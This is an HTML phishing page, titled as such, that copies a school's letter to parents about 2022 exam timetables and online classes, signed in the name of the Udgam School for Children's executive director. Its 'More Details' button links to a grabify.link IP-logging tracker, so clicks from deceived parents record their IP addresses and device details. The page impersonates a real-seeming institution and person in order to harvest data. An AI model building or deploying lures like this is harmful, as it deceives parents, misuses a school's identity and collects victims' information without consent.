<html>
<head>
    <title>Phishing Website</title>
    
    <link rel="stylesheet" href="style.css">
    
    
    </head>
    <body>
    
<img src="https://ci4.googleusercontent.com/proxy/BF6ZWU8gZ0DzzSdaXGXBR_gGrrmmU_XhWhNtbB_ZzibdgSMVW0a0r6rHWLYpB1jWP0yyhJU1lqrvaeo6idMPseeuR1M-gua9Z38lwC5TGTuCl-uKEJUywuQRStM5i2wMHIEvCMAOiEND=s0-d-e1-ft#https://files.constantcontact.com/65bde37a401/75ba95f1-bf6c-43aa-9467-c0ca6c5313a1.png">
        
        <h1 id="header">UDGAM SCHOOL FOR CHILDREN</h1>
        
        <p id="para">
            
            

Dear Parents,
<div></div>
We are in the last leg of the current academic year 2021-22. Looking at the COVID situation in Gujarat, we have moved entirely to online education before the Government gave the order. 
<div></div>


However, we anticipate improvement in the situation in the near future.
<div></div>


Few parents have also been optimistic like us and are keen to take a vacation after the final exams. They have been asking for the time table of the exams which are supposed to be held at the end of the academic year. With so many uncertainties we are unable to give a perfect time table. As of now we have planned, the final exams will get over by 16th March 2022. The new academic year will start from 31st March 2022. 

<div></div>

As of now please be aware that our plan is that we take exams at school - online. A lot will depend on how situation unfolds and the rules of the govt regarding promotion and examinations. 
<div></div>


The Vice-Principals shall communicate the timetable course of time.
<div></div>


Regards,

<div></div>

Mr Manan Choksi<br>

Executive Director,<br>

        Udgam School for Children</p>
    
    <a href="https://grabify.link/TGV5IZ"> 
        <button id="btn">More Details</button></a>
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    </body>





























</html>